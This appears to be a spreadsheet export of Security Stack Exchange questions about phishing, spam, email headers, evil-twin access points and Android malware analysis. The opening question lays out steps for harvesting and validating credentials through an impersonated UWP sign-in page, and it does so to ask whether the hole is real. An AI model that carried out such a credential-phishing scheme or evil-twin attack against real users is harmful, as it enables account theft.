 &lt;li&gt;Have the user sign into your page (thinking it is a legitimate credential location -- the one you are impersonating). &lt;a href="https://social.msdn.microsoft.com/Forums/windowsapps/en-US/61430b68-0df7-4605-b714-809a361e1167/uwp-is-it-still-possible-to-hack-phish-webauthenticationbroker?forum=wpdevelop" rel="nofollow"&gt;Since it has been confirmed that UWP and WebAuthenticationBroker does not display the URL/domain the user is signing into&lt;/a&gt;, it can be anywhere that is under your control and the user will not know.&lt;/li&gt;
 &lt;li&gt;Validate credentials using the real authentication provider. If it works, pass the user on to the real sign in page (or better yet, simply set cookies on the user's session that makes it seem all is OK).&lt;/li&gt;
 &lt;li&gt;Once you have obtained validated credentials, store the credentials for a later time, or use them for nefarious purposes immediately.&lt;/li&gt;
 &lt;li&gt;Rule planet Earth with your new-found powers (OK I made this one up).&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;First off, I would like to verify with certainty that my understanding on the above process is accurate (last step notwithstanding, of course -- or is it?!). Is there something that I am not accounting for that makes this a non-issue?&lt;/p&gt;
 &lt;p&gt;If I do understand this correctly, it seems like this is a possible security issue with UWP and one that has not been addressed for over three years now. The guidance given from the MSFT CSG is to open a UserVoice vote for this issue. &lt;strong&gt;However, it seems to me that a security issue is one you &lt;em&gt;fix&lt;/em&gt; and &lt;em&gt;not&lt;/em&gt; one that you vote to address.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;So my question is: Is this a legitimate concern? Or am I making a big deal about nothing here? Or is there something I have completely misunderstood (quite possible) that makes this a non-issue?&lt;/p&gt;
 &lt;p&gt;Thank you in advance for any assistance and/or clarification to my understanding around this issue, and around security in general.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;exploit&gt;&lt;phishing&gt;&lt;windows-8&gt;&lt;windows-10&gt;</t>
  </si>
  <si>
    <t>Phishing e-mail replied to internal email. What is compromised?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have received a phishing email trying to get money from us, this email came from an account that was spelled closely to our work email but not quite the same. &lt;/p&gt;
 &lt;p&gt;I have looked up the domain and found it was apparently set up yesterday.&lt;/p&gt;
 &lt;p&gt;My true concern is that the e-mail was RE:&amp;lt;SUBJECT&amp;gt; where the subject and recipients were all part of a real internal email chain. The email was not really a reply but the subject was correct and was from an email sent hours earlier.&lt;/p&gt;
 &lt;p&gt;What sort of compromise in my (G-suite) system would allow someone to be able to read subjects but not have full access to the email itself?&lt;/p&gt;
 &lt;p&gt;Other then full password re-sets should I be concerned about additional holes? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;&lt;system-compromise&gt;</t>
  </si>
  <si>
    <t>How to fight specific spam message pretending to be from my company?</t>
  </si>
  <si>
    <t>&lt;p&gt;(Okay, not my company, but a buddy works there and they are at a loss on what to do, so same premises of the question)&lt;/p&gt;
 &lt;p&gt;So over the last few days I received a couple of spam messages, pretending to be from well known company, offering a year of free shopping in their stores. spammers aren't even trying very hard to create cover-up &lt;em&gt;From:&lt;/em&gt; addresses (chimelu@bogard.bc13.rayne.okstopandgoraffic.top for example), but the company feels it is hurting their image and want to put a stop to it. I've reported the messages repeatedly through SpamCop, but is there a way to fight the root of the problem? &lt;/p&gt;
 &lt;p&gt;Note that this is not one of the many questions about how to keep my inbox/spambox clean, it is a question about how to safeguard the company's image.&lt;/p&gt;
 &lt;p&gt;EDIT 21/09/2016 08:54: 
 What if this company was willing to spend some serious money on court cases and lawyers etc. How would one go about on finding the people responsible for sending the spam? I imagine they are hard to find, but not impossible. Are there companies that specialise in this or something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>UPChoo</t>
  </si>
  <si>
    <t>Is it ever safe to open a suspicious HTML file (e.g. email attachment)?</t>
  </si>
  <si>
    <t>&lt;p&gt;If I receive an email that has an attachment called something like &lt;code&gt;safe-link.html&lt;/code&gt; would it ever be safe to open this file?&lt;/p&gt;
 &lt;p&gt;Clearly, HTML files may have malicious scripts embedded that could run when opened with a browser. However, I'm wondering if any breaches could occur upon downloading the file and then opening it in &lt;a href="http://en.wikipedia.org/wiki/Notepad_%28software%29" rel="nofollow noreferrer"&gt;Notepad&lt;/a&gt; / other basic text editor rather than a web browser?&lt;/p&gt;
 &lt;h3&gt;Background&lt;/h3&gt;
 &lt;p&gt;I'm only asking because the company I work for like to send out 'test' phishing emails from time to time, and the latest had an HTML attachment. I suspected the email immediately (so didn't click to open the attachment in a browser), but I was intrigued to see if it actually was another test!&lt;/p&gt;
 &lt;p&gt;So I suggested to colleagues that the file be opened with Notepad. We‚Äôre all savvy enough to read HTML, so would immediately spot the usual "If this wasn't just a test, your computer would be compromised!‚Äù, but they were extremely concerned that I had thought to interact with the file at all. &lt;/p&gt;
 &lt;p&gt;I'm reasonably confident that any malicious script in an html file would have to be opened in a web browser for it to have any effect. &lt;/p&gt;
 &lt;p&gt;Are my colleagues being too cautious, or was I being overzealous?&lt;/p&gt;
 &lt;p&gt;I'm an advocate of "better safe than sorry", so I don't think they were wrong not to open it; I just also don't believe it was completely unsafe to open with something like Notepad. I am very intrigued to find out!&lt;/p&gt;
 &lt;h3&gt;"Gotchas" I'm aware of:&lt;/h3&gt;
 &lt;p&gt;I believe editing it in a more complex website development tool (that actually renders the page in a preview) could be dangerous. &lt;/p&gt;
 &lt;p&gt;Also, I'm aware that simply double clicking the file (even if the default "open with" is set to be a text editor) could be dangerous. This is because something like &lt;code&gt;readme.txt&lt;/code&gt; could actually be &lt;code&gt;readme.txt.exe&lt;/code&gt; with file extensions hidden in something like Windows File Explorer.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;phishing&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>How can an email header be used to verify the real sender?</t>
  </si>
  <si>
    <t>&lt;p&gt;Lets say you're the target an advanced phishing attack, meant to look like it came from Amazon.com. It shows &lt;code&gt;@amazon.com&lt;/code&gt; in the sender field, but you're suspicious. You can call Amazon and find out, but lets imagine that you couldn't. Is it possible to look at the header of the email and verify with any level of certainty that the email did or did not come from Amazon?&lt;/p&gt;
 &lt;p&gt;Here's a header from an email I received which Amazon support verified was not from them:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; From security - update @amazon.com Wed Jun 15 05: 35: 15 2016
  X - Apparently - To: ***** @yahoo.com;
  Wed, 15 Jun 2016 05: 35: 16 + 0000
  Return - Path: &amp;lt; 2016061505351500688 fd1d5684edabf9d32ee87d0p0na @bounces.amazon.com &amp;gt;
  Received - SPF: pass(domain of bounces.amazon.com designates 54.240.13.30 as permitted sender)
  YW5kIHByaXZhY3kgdmVyeSBzZXJpb3VzbHkuIEFzIHBhcnQgb2Ygb3VyIHJv
  dXRpbmUgbW9uaXRvcmluZywgd2UgZGlzY292ZXJlZCBhIGxpc3Qgb2YgZW1h
  aWwgYWRkcmVzc2VzIGFuZCBwYXNzd29yZHMgcG9zdGVkIG9ubGluZS4gV2hp
  bGUgdGhlIGxpc3Qgd2FzIG5vdCBBbWF6b24tcmVsYXRlZCwgd2Uga25vdyB0
  aGF0IG1hbnkgY3VzdG9tZXJzIHJldXNlIHRoZWlyIHBhc3N3bwEwAQEBAQN0
  ZXh0L3BsYWluAwMy
  X - YMailISG: bvKKjZcWLDuqAP4uJx5EzWqDZs4AGZltJxwsTWfKWTo3MpLP
  RRAOPYJ0kEPrw4uT_S5NxE1XUyrqTYMpgofwIq41BJ0ZeIqhv5jhgkOcTT3f
  iwxX2SoomtBJ.ueo90kdV4tTSihP0_Igz8dlfJb4tSARevolMmcQ2dvAWbNs
  not5nyJJkw9rvBxeLa38H_diZewKRWfDi_pVCnd8tw9a0o9uxwsB1KMu5Sxf
  81 SekEnsOZdct9N0SXP_DCg0_xNBS33DybGyj9PDcwrsQp5yBHE3mnFwBz2a
  yXlyJ88Hw6BLyXAFWCrnb3JyBV1eTg2TrTJvRHLsXcVimTAIhGAYO6a5Yt8D
  yl9HIJ..V33ir0l7nUeA19KkacDYEnSPfOzgGrBP5ChAB7RQ0FlabG_xgVB_
  SmGw4QGJqruH7Gsa5vT9v15phcwEbvGZQTkEVPFNZc.kvPrX3wTgbhCB7qHI
  vAZKPdIDloLiA10qmW0J1.sxdMApofO1EVi0AncLnXOb9Y6ZArYLomqTtjeq
  TF1AE9QFzTDIAmGHZQlRTpSZHgoOFKMt8PrFw7nuCxjft_.zgg4X2nEl2WfP
  vwwm7_t4wpoX_GkTEAepUL..F5lLKaJg4w36T5qzMxFx3.eiqYy00Bda_Io2
  TjX._44ji3VCVYIWHPAm_Q08iVFjXUHRIW69rp2A4n7gkAo_9NaY_m_zvSju
  ctYuA4TEe7L8XyK.1 Ah0kPmAFbXAYgB74HluZ4GxKONxK33kJkkrUkNTcp7d
  2 CyNppWJ2gBJ.xb8_OnuFuGtzfvAn7i3CkluWZt.uLLliwGZo86W.s6J5HYS
  4 mvCm3cHR5Zg16UFxH5Qyw_iDGePt8EgMLhjV2rKGdYBF0bOu2TSZb1AcT5n
  JRwjJMa8i7KqxsuiwzKhDJOaYXfGaBC2M13N6QeggiO7FKHXXMUplnK3.gtP
  KzrvBVTVVYQdoWFL7mB6lJK7rG5ZJV.SduOUyAsDC.3 JUg86MwPwuGpC1sLe
  sIsNU_zF1cZiQEXcD2DlHJxniCxn74BEGgyF8dO1oh6.SkKIHNjud2bnmqDx
  lqvSL7NzUsJwclMvxPY3UtmLs95cvUcBvIOVZR9ovhgSD_g9joPYVLE0.3 zu
  _dDuD07BSJtT.ICNzqQcg4VJ.CzTQWH0Eb78qC0QCui0KA_USNINQXT.ZWho
  CsLIyorUTUtTWdgtbltDb9dhUxf9vs6cgGHFtlBBWyWUi_Y8MxxhdTwwjW.l
  ErgFJ4WDsKVSZqE0MqMQJij7g3t5Qf4UNcx7dVFIknpL3.k.gsz8nMEyA.6 k
  nEvz45gD2nXSU1JVFQXwXnwaqlBBu6AaTXsuz_9snKkMkwJJKbfxew.yuI49
  SbDEnYnH_1kqdD6Dsh9mhlTTZIx4EnD2vO3TV_vQGdJaZSm1Jy2wn0etnCi4
  JprcFP9MsQIrULrsdBDTAdwa_3qC_FC7Zo.Hxh91sL3cHnRLRwybhD0jTbqP
  TdzqqnMe8rzhGk3QfnyTPO.I3YR7rx8HDh743dY -
  X - Originating - IP: [54.240.13.30]
  Authentication - Results: mta1509.mail.gq1.yahoo.com from = amazon.com;
  domainkeys = neutral(no sig);
  from = amazonses.com;
  dkim = pass(ok)
  Received: from 127.0.0.1(EHLO a13 - 30. smtp - out.amazonses.com)(54.240.13.30)
  by mta1509.mail.gq1.yahoo.com with SMTPS;
  Wed, 15 Jun 2016 05: 35: 16 + 0000
  DKIM - Signature: v = 1;
  a = rsa - sha256;
  q = dns / txt;
  c = relaxed / simple;
  s = eaxkvsyelrnxjh4cicqyjjmtjpetuwjx;
  d = amazon.com;
  t = 1465968915;
  h = From: To: Message - ID: Subject: MIME - Version: Content - Type: Date;
  bh = 6 MBHnat6TXZGDjYr8xS + fQIKeGWNo2gEkiV7HI92Lgk = ;
  b = GhJgCJCM6N1IksIdk3YMJAN01Rs / 5 i5Qo8V / DW / exZk / lv0n00lRSgx + H6GgJ0Cm
  6 VOi0o848HKD6ozzXuOrtw0NqRVHFUEG9 / 37 yBfhYMW9nt5 + fa3jqL4PaA4kqhsH52a
  70 SEPkxxhqZGjN4kmR2lLyYs9LWPo0Zmc0jdjx3I =
  DKIM - Signature: v = 1;
  a = rsa - sha256;
  q = dns / txt;
  c = relaxed / simple;
  s = 6 gbrjpgwjskckoa6a5zn6fwqkn67xbtw;
  d = amazonses.com;
  t = 1465968915;
  h = From: To: Message - ID: Subject: MIME - Version: Content - Type: Date: Feedback - ID;
  bh = 6 MBHnat6TXZGDjYr8xS + fQIKeGWNo2gEkiV7HI92Lgk = ;
  b = sg9kv2564IQpHZ9P5fjZzgo43k1OQT1Q / 8 u2FSyhaLfrRVtjvAQdkLfhMMyupVu3
  70 VavyNthdmQEmawWGHM0dnviOPxUCOAF4KxrYi1s22vecoNEvjjDBy1xiGBzzeXtM6
  YRutkI3NrIG / A3ylPGub8So0H1MoQ90uSmZdFiT8 =
  From: security - update @amazon.com
  To: ***** @yahoo.com
  Message - ID: &amp;lt; 01000155528e74 f4 - b61f49db - 5 a99 - 47 f0 - 8220 - de3d790e7100 - 000000 @email.amazonses.com &amp;gt;
  Subject: Your Amazon password has been changed
  MIME - Version: 1.0
  Content - Type: multipart / alternative;
  boundary = "----=_Part_435506_288452969.1465968915690"
  X - AMAZON - MAIL - RELAY - TYPE: notification
  Bounces - to: 2016061505351500688 fd1d5684edabf9d32ee87d0p0na @bounces.amazon.com
  X - AMAZON - METADATA: CA = C34L8ES1N9UV8E - CU = AYTEASIHBL0P9 - RI = A1BTPRBNF2RGB1
  X - Original - MessageID: &amp;lt; urn.rtn.msg.2016061505351500688 fd1d5684edabf9d32ee87d0p0na @1465968915691.rtn - svc - na - us - east - 1e- i - 5 a3634e4.us - east - 1. amazon.com &amp;gt;
  Date: Wed, 15 Jun 2016 05: 35: 15 + 0000
  X - SES - Outgoing: 2016.06.15 - 54.240.13.30
  Feedback - ID: 1. us - east - 1. ZHcGJK6s + x + i9lRHKog4RW3tECwWIf1xzTYCZyUaiec = : AmazonSES
  Content - Length: 1794
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is it possible to verify that the email was not from Amazon just by looking at this header?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;</t>
  </si>
  <si>
    <t>What is best practise to send credit card details update emails when the details have expired?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently an organization I forgot to update credit card details had my renewal payment fail because I forgot to update details. They sent an email as below which had a direct link to a web form without any instructions to check authenticity. I think this is bad practice because it trains members to blindly accept direct links to update details which are similar to phishing emails.&lt;/p&gt;
 &lt;p&gt;I know this reduces membership renewal (as every additional step discourages signup as people are busy) but the email should ask users to go to the website from bookmarks or manually enter it in or ask users to internet search the organisation names (although this also has issues with scammers advertising scam websites).&lt;/p&gt;
 &lt;p&gt;The organisation's counter-argument was that a hypothetical nefarious cracker could put false instructions anyway.&lt;/p&gt;
 &lt;p&gt;What's best practice in this regards? Am I being too strict or nit picking?&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;h2&gt;Membership Payment Failed at &amp;lt;organisation&amp;gt;&lt;/h2&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;The current subscription payment for your &amp;lt;organisation&amp;gt; membership has failed. Please click the following link to log in and update your billing information to avoid account suspension. https://&amp;lt;org domain&amp;gt;/wp-login.php?redirect_to=https%3A%2F%2F&amp;lt;org domain&amp;gt;%2Fmembership%2Fmembership-billing%2F&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Account: &amp;lt;my username&amp;gt; (&amp;lt;my email&amp;gt;)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Post Updated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;credit-card&gt;&lt;updates&gt;</t>
  </si>
  <si>
    <t>Can not create an "evil twin access point" with the same SSID as the original</t>
  </si>
  <si>
    <t>&lt;p&gt;I am practising pen-testing for a while now and I have a kali Linux 2017.2 physical machine. I tried to create an evil twin access point using tools like fluxion, wifiphisher and wifi-pumpkin. Note that I used an Alpha Card AR9271. &lt;/p&gt;
 &lt;p&gt;When the access point is created does not have the same name as the target network. For example if the network's name is "dog", after the creation the available network name is "dog 2" instead of "dog". Any ideas?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;evil-twin&gt;&lt;rogue-ap&gt;</t>
  </si>
  <si>
    <t>Why would a scammer ask for creation of a new email account?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently received the following email:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Good day my dear friend,
  I am contacting you to help get the deposit (¬£8.5 million pounds), my late
  client Engineer Alexander left in his Bank before his sudden death with
  his wife and their only daughter to avoid confiscation.
  For more information about this transaction to continue with me on our
  E-mail: [scammer's email redacted] or you can provide your private E-mail
  address, so that I can write to you with details.
  I find it very difficult to send this items to you because of your
  differences domain / IP. I suggest you create a yahoo.com, Hotmail.com or
  gmail.com and reply me through it easily our correspondence. With kind regards and best wishes, Barrister Dr.Simon peter Esq....&lt;/p&gt;
  &lt;p&gt;[Message clipped] View entire message&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Sadly, I can't help out Barrister Dr. Simon Peter Esq as I tend to get a terrible rash in the presence of large sums of money. However, this part of the email caught my eye:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;I find it very difficult to send this items to you because of your
  differences domain / IP. I suggest you create a yahoo.com, Hotmail.com or
  gmail.com and reply me through it easily our correspondence.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;This seems to match up as I got this email in a zoho.eu inbox using a custom domain.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Why would they ask for creation of a new account on a popular mail site?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Identify purpose of spam/phishing email</t>
  </si>
  <si>
    <t>&lt;p&gt;Lately, I have been getting these types of emails that do not appear to be standard spam/phishing emails but obviously, they are not &amp;quot;normal&amp;quot; emails either. Can anyone help me to find the purpose of these emails?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/vCOAp.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/vCOAp.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>What is the severity of a fake certificate?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm not a security specialist, thus reading this &lt;a href="http://googleonlinesecurity.blogspot.com/2013/01/enhancing-digital-certificate-security.html" rel="nofollow"&gt;Google Blog post&lt;/a&gt; about a fake &lt;code&gt;*.google.com&lt;/code&gt; certificate, raises a lot of concerns, if anyone can impersonate a website, especially a google website, my naive understanding is that this can be used for phishing attacks and identity theft related fraud massively. &lt;/p&gt;
 &lt;p&gt;What I would like to ask, and please forgive my ignorance, is how a fake certificate useful this way, if I type &lt;code&gt;X.google.com&lt;/code&gt;, it will go to a Google Sub-domain in any case (e.g. fraudster will need to also hack some DNSs / hosts to be able to redirect to his own malicious site, is that correct?) &lt;/p&gt;
 &lt;p&gt;My question is this, is a fake certificate only useful in combination of a DNS hijack (or any other method that will point the fake cert's target domain to a fraudulent IP, e.g. modifying hosts file etc?)
 i.e. I assume it's not useful if the user is clicking on a link a la &lt;code&gt;givemeyourlogindetails.google.somehoaxdomain.com&lt;/code&gt; and tempted to think it's "real" just because the padlock is green (and I assume it won't be green anyway as the domain doesn't match) &lt;/p&gt;
 &lt;p&gt;I'm sure I'm missing some security 101, but I couldn't be sure I fully understand the big picture here.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;certificate-authority&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>Is this email from OneDrive a phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I received an email claiming that my OneDrive account is going to be deleted as it has been unused for the past two years. This is probably true.&lt;/p&gt;
 &lt;p&gt;The email urges me to visit OneDrive to reactivate my account before a date roughly 3 months from now so I may keep my account. Seems reasonable.&lt;/p&gt;
 &lt;p&gt;What gives me pause:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The email does not use my (fake) name associated with the account, or any name at all.&lt;/li&gt;
 &lt;li&gt;The links go to onedrive.com, whereas onedrive is typically accessed from onedrive.live.com&lt;/li&gt;
 &lt;li&gt;The only place I can find that says the above site is correct is wikipedia&lt;/li&gt;
 &lt;li&gt;The whois information isn't overly helpful (to my untrained eye), but is quite different from the live.com whois information&lt;/li&gt;
 &lt;li&gt;Email is from email@mail.onedrive.com, seems within reason, but a little odd&lt;/li&gt;
 &lt;li&gt;3 of the 4 links in the email go to the same page, just with a different UUID attached to the end&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Reasons why I'm not so sure:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Microsoft has sent me legit emails from other domains before. Clearly not understanding the phishing risk this causes for their users.&lt;/li&gt;
 &lt;li&gt;Microsoft hasn't picked it up as a scam/junk (not many get through)&lt;/li&gt;
 &lt;li&gt;Thunderbird hasn't marked it either (normally gives me tons of false positives)&lt;/li&gt;
 &lt;li&gt;It is a domain one would expect Microsoft to have snapped up&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Easy solution:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Go to the legit website and log in, if it's a scam then no harm, if it's not then problem solved.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Unfortunately, I'm the tech geek for quite a few family members that don't understand online scams so well. If it is indeed a scam, I need to let them know so they can recognize it.&lt;/p&gt;
 &lt;p&gt;Can someone who is a little more sleuthy figure this one out for me and my naive relatives? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;microsoft&gt;&lt;whois&gt;</t>
  </si>
  <si>
    <t>Is my PC safe? need help</t>
  </si>
  <si>
    <t>&lt;p&gt;About 6 days ago my parents who aren't great with PCs got phished on gmail, and the account started spreading spam.&lt;/p&gt;
 &lt;p&gt;It had been hacked on an Argentinian IP, and then logged in from IMAP and SMTP from the UK. At the moment it was logged in from the UK, it sent spam out on the gmail contacts briefly.&lt;/p&gt;
 &lt;p&gt;We changed the password and added 2 step verification. The account has not had any attempted log ins since, and no suspicious activity.&lt;/p&gt;
 &lt;p&gt;However, since I probably have crazy anxiety problems, I am scared that malware or a virus could have gotten into the machine, however I see no signs.&lt;/p&gt;
 &lt;p&gt;‚Ä¢ I checked msconfig for bad entries&lt;/p&gt;
 &lt;p&gt;‚Ä¢ I scanned with MSE, Mbam, Mbam Anti rookit, Tdsskiller, Spybot, norton 360, kaspersky pure 3.0, norton pe, and it has all come clean, all on full scans.&lt;/p&gt;
 &lt;p&gt;‚Ä¢ I dont see any suspicious activity network wise. (Kaspersky shows 34 ports listening for svchost, 11 for system, is that normal?)&lt;/p&gt;
 &lt;p&gt;‚Ä¢ Nothing seems to be changed, and the pc runs fine.&lt;/p&gt;
 &lt;p&gt;One of my main reasons I'm worried, is that I believe my own pc was running and connected to the network when my parents got on the phishing link. And the next day it was running and connected, and my parents PC was on too.&lt;/p&gt;
 &lt;p&gt;I haven't turned my PC on since, and I have been stressing and scanning for Long time now on my parents PC.&lt;/p&gt;
 &lt;p&gt;I was even thinking about going around with my win7 install disk and formatting all the PCs..&lt;/p&gt;
 &lt;p&gt;Can anyone shed some light on this? What's the possibility my parents PC got infected? And could it have spread to other PCs?&lt;/p&gt;
 &lt;p&gt;If it helps, my situation is similar to this Don't understand how my mum's Gmail account was hacked&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Phishing: can input data be saved before I hit the button?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just clicked a phishing link and foolishly entered my credit card details. I realized it was phishing before I hit SUBMIT. Is there a chance I exposed my data?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;data-leakage&gt;&lt;input-validation&gt;</t>
  </si>
  <si>
    <t>Do hacks of mainstream web applications tend to happen more from random attackers brute forcing or from targeted heuristic attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm writing up advice for selecting a master password for a password manager, and I'm wondering if there is available data about the likelihood of different attacks that result in a cracked password. I'm interested in data relevant to what a user is able to control with the password itself (so, something like phishing isn't on my radar as much since the vulnerability is the user rather than the string of characters themselves).&lt;/p&gt;
 &lt;p&gt;So, for a secure password, I'm thinking I'll recommend, in descending order of importance:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;length (brute force)&lt;/li&gt;
 &lt;li&gt;uniqueness (reverse brute force, matching username/password of hacked Site A to secure Site B)&lt;/li&gt;
 &lt;li&gt;impersonality (guessing based on knowable personal details)&lt;/li&gt;
 &lt;li&gt;ease of memorization (indirectly relevant; the first three make a password hard to remember, so you have to decide if you're gonna sacrifice those to remember better or if you're gonna write it down and risk the paper getting stolen)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I have length at the top because 1) research generally cites it as the best and easiest way to make a password safer and 2) in my experience, attacks seems to be en masse/random more than they are targeted for an average end user.&lt;/p&gt;
 &lt;p&gt;I know there are a ton of caveats; the threat model for a high-level politician's email is different than a teenager's Facebook. Maybe you trust your safe more than your memory. But is there relevant data that answers this question on a high level?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; to rephrase the question:&lt;/p&gt;
 &lt;p&gt;If I &lt;em&gt;must&lt;/em&gt; make a tradeoff in my password strength somewhere (as in, in order to make my password easier to remember, I will either make it shorter or use my birthdate instead of random numbers), which attack should be treated as more likely for the average user of a mainstream web application?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;password-management&gt;&lt;password-cracking&gt;&lt;password-policy&gt;</t>
  </si>
  <si>
    <t>Extract urls from obfuscated android malware</t>
  </si>
  <si>
    <t>&lt;p&gt;Working on android malwares, i have faced many android malwares that typically contain urls which are &lt;strong&gt;bank phishing page&lt;/strong&gt;. This type of malwares are growing in number so an &lt;strong&gt;automated&lt;/strong&gt; detection system is really needed. The very first step to detect such malwares is &lt;strong&gt;url/link extraction&lt;/strong&gt;. &lt;/p&gt;
 &lt;p&gt;One simple static approach is to decompile the app and search for strings beginning with "http" in source code. There are many tools and libraries such as &lt;a href="https://github.com/amaurremi/stringoid" rel="nofollow noreferrer"&gt;stringoid&lt;/a&gt;, &lt;a href="https://github.com/UltimateHackers/Diggy" rel="nofollow noreferrer"&gt;Diggy&lt;/a&gt;, &lt;a href="https://github.com/rovellipaolo/NinjaDroid" rel="nofollow noreferrer"&gt;NinjaDroid&lt;/a&gt;, &lt;a href="https://github.com/androguard/androguard" rel="nofollow noreferrer"&gt;Androguard&lt;/a&gt; and many others but as far as i have tested these tools, they can not detect obfuscated urls. For example, consider this code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;this.c = "/something";
 this.d = new String(Base64.decode(Application.a, 0));
 this.a.loadUrl(this.d + this.c);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It's clear that static analysis alone is insufficient so i'm looking for some other solutions. So far, i have seen some approaches in some articles that try to extract such obfuscated strings from android APK files. One example is &lt;a href="http://ieeexplore.ieee.org/document/7846971/" rel="nofollow noreferrer"&gt;ForceDROID&lt;/a&gt; that presents a hybrid (both static and dynamic) technique for extracting hidden information. This technique works by changing control flow conditions to execute a certain path. &lt;a href="http://isyou.info/inpra/papers/inpra-v4n2-01.pdf" rel="nofollow noreferrer"&gt;Another example&lt;/a&gt; is based on deobfuscation.&lt;/p&gt;
 &lt;p&gt;These techniques are all great but the problem is that there isn't any implementation of them available. &lt;/p&gt;
 &lt;p&gt;Unfortunately, i'm not skilled enough to implement such techniques. One approach i think of is to first use an deobfuscator such as &lt;a href="https://github.com/CalebFenton/simplify" rel="nofollow noreferrer"&gt;simplify&lt;/a&gt; and then extract urls through static analysis (using the tools mentioned above).&lt;/p&gt;
 &lt;p&gt;What are other ways to automatically extract obfuscated urls? Is there any tools or library out there? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;android&gt;&lt;obfuscation&gt;&lt;static-analysis&gt;&lt;dynamic-analysis&gt;</t>
  </si>
  <si>
    <t>One of my open files turned into a list of URLs and codes after clicking a link on a phishing email?</t>
  </si>
  <si>
    <t>&lt;p&gt;So I received a non-filtered email earlier today supposedly from Itunes under my email address with an invoice for Netflix subscription. Some of the links were genuine, but ultimately I clicked on a bogus link before it clicked that it was spam.&lt;/p&gt;
 &lt;p&gt;My browser picked up on the dodgy site and warned me it was unsafe at which point I realised and exited the website. However, I'm unsure if any damage could be done by this point? I did not actually see the webpage and obviously did not enter any details.&lt;/p&gt;
 &lt;p&gt;I was working on a programming assignment for university at the time which I saved as a .asl file. I saved it and restarted my computer. However, now I've gone to open the file again, I've found my code gone and instead there is a list of urls, most of which I recognie as ones I've visited.&lt;/p&gt;
 &lt;p&gt;They are in the format...&lt;/p&gt;
 &lt;p&gt;url.com:HSTS 15 16234 1482854842001,1,0
 www.url2.com:HSTS 1 16236 1438483201934,1,1
 .......&lt;/p&gt;
 &lt;p&gt;The numbers I've given are mostly randomised but of the same/similar length as the ones in the file. The last two digits are all 1s or 0s.&lt;/p&gt;
 &lt;p&gt;Does anyone have any idea what this could be? Should I be worried? Maybe it's a result of something else?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;phishing&gt;&lt;hsts&gt;</t>
  </si>
  <si>
    <t>website hacked - phishing form</t>
  </si>
  <si>
